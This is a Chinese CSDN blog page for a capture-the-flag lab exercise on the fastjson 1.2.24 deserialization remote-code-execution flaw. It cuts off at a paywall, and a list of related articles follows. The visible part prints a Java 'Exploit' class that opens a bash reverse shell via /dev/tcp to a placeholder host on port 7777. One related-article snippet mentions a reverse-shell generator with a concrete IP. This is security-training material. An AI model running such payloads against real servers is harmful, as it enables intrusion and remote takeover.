【漏洞靶场】--fastjson 1.2.24 反序列化导致任意命令执行漏洞

最新推荐文章于 2024-04-17 11:42:59 发布
最新推荐文章于 2024-04-17 11:42:59 发布
阅读量510 收藏
点赞数
分类专栏: BMZCTF 文章标签: java 安全 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41152432/article/details/122339927
版权

漏洞环境

在这里插入图片描述

以上是fastjson搭建好的默认页面。

exp准备

准备好如下Java代码:

	import java.io.BufferedReader;
	import java.io.InputStream;
	import java.io.InputStreamReader;
	
	public class Exploit{
	    public Exploit() throws Exception {
	        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ip/7777 0>&1"});
	        InputStream is = p.getInputStream();
	        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.clo
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java执行脚本语言demo
Coder_android
11-11 1029
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime.get
Fastjson反序列化漏洞详解
zhuyi666的博客
03-13 3001
fastjson介绍:fastjson 是一个java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse 的性能提升到了极致。FastJson是啊里巴巴的的开源库,用与对JSON格式的数据进行解析和打包。速度快使用广泛测试完备使用简单功能完备JSON数据格式{"name":zy, "age":22, "flag":true, "gender":male, "address":cs}("key":value)
Fastjson 1.2.24反序列化漏洞复现
weixin_60830484的博客
04-17 352
本文将进行一次详细的Fastjson 1.2.24反序列化漏洞复现
Fastjson反序列化漏洞
mingyqf的博客
12-03 423
原文链接:https://blog.csdn.net/Curry197/article/details/125090159Curry197 已于 2022-06-01 21:22:57 修改 2786 收藏 2 分类专栏: 漏洞复现 文章标签: 安全 web安全 网络 版权 漏洞复现 专栏收录该内容 2 篇文章 0 订阅 订阅专栏参考链接:fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)_GeekCoderBrick的博客-CSDN博客_fastjson反序列化漏洞
使用Java脚本引擎执行javascript代码示例
bboy枫亭的博客
09-28 554
JAVA脚本引擎是从JDK6.0之后添加的新功能。 • 脚本引擎介绍: – 使得 Java 应用程序可以通过一套固定的接口与各种脚本引擎交互,从 而达到在 Java 平台上调用各种脚本语言的目的。 – Java 脚本 API 是连通 Java 平台和脚本语言的桥梁。 – 可以把一些复杂异变的业务逻辑交给脚本语言处理,这又大大提高了 开发效率。 • 获得脚本引擎对象 //获得脚本引擎对象 ScriptEngineManager sem = new ScriptEngineManager(); ScriptEn
fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 938
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
java调用脚本语言笔记(jython,jruby,groovy)
07-29
NULL 博文链接:https://yinxvxv.iteye.com/blog/811328
Fastjson反序列化漏洞分析
热门推荐
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
漏洞复现系列--fastjson<=1.2.47反序列化漏洞
梦之旅行地
07-27 2121
1.利用条件 fastjson <= 1.2.47 2.复现环境 靶机:vulhub靶场 攻击环境:一台公网vps,本地burp发送攻击数据包 3.具体步骤 1)docker起靶场 进入到vulhub靶场1.2.47-rce目录环境下 cd 1.2.47-rce docker-compose up -d 浏览器访问靶场环境如下 2)反弹shell命令制作 https://krober.biz/misc/reverse_shell.php?ip=122.51.255.154&port=94
java 手机脚本_autoA开源(用java写安卓无障碍脚本)
weixin_39574065的博客
02-23 2165
类ScreenLib类 封装了模糊找色,屏幕点击,屏幕滑动等方法。TsFrame抽象类 封装了脚本的逻辑流程(帮助你快速开发脚本)Fa和Fb 都是继承自F,他们大部分方法都是一样的。重新封装了屏幕点击和模糊找色的方法给TsFrame.继承关系:ScreenLib → F → Fa(Fb同此)怎么创建一个游戏脚本?创建一个class继承TsFrame重写getFa和getFb方法即可。示例代码:pu...
java可以做安卓脚本吗?_一些快速提高Android开发的脚本与技巧
weixin_29081163的博客
02-25 906
正所谓“工欲善其事必先利其器”,一个好的工具或者技巧能让提升工作效率,起到事半功倍的效果。在这里斗胆列出一些窃以为一些可能快速提高Android日常开发的脚本,希望可以为大家提供一些好的工具,有帮助的思路。打印Debug日志信息该脚本打印了包含崩溃,异常,dalvikvm信息,严格模式和网页CONSOLE等信息。[代码]java代码:123456789#!/bin/sh#Explanations:...
CNVD-2019-22238:Fastjson 1.2.47 反序列化漏洞复现
冬的博客
03-16 2138
Fastjson 存在反序列化远程代码执行漏洞,当应用或系统使用 Fastjson 对由用户可控的 JSON 字符串数据进行解析时,将可能导致远程代码执行的危害。
java 反显_java反序列化的恶意类回显实验
weixin_33102135的博客
03-07 472
//希望自己能持续的坚持学java因为看书学java有点枯燥,虽然我没搞清楚状况,但是还是希望做个实验。以下是实验记录。前提条件准备一个 漏洞环境,比如vulhub里的fastjson开始实验vulhub 里的readme里的payload类似以下{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{...
fastjson反序列化分析
hongduilanjun的博客
03-16 2584
1.fastjson简单使用 User: package com.naihe; public class User { private String name; private int age; public User() {} public User(String name, int age) { this.name = name; this.age = age; } public String getName
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值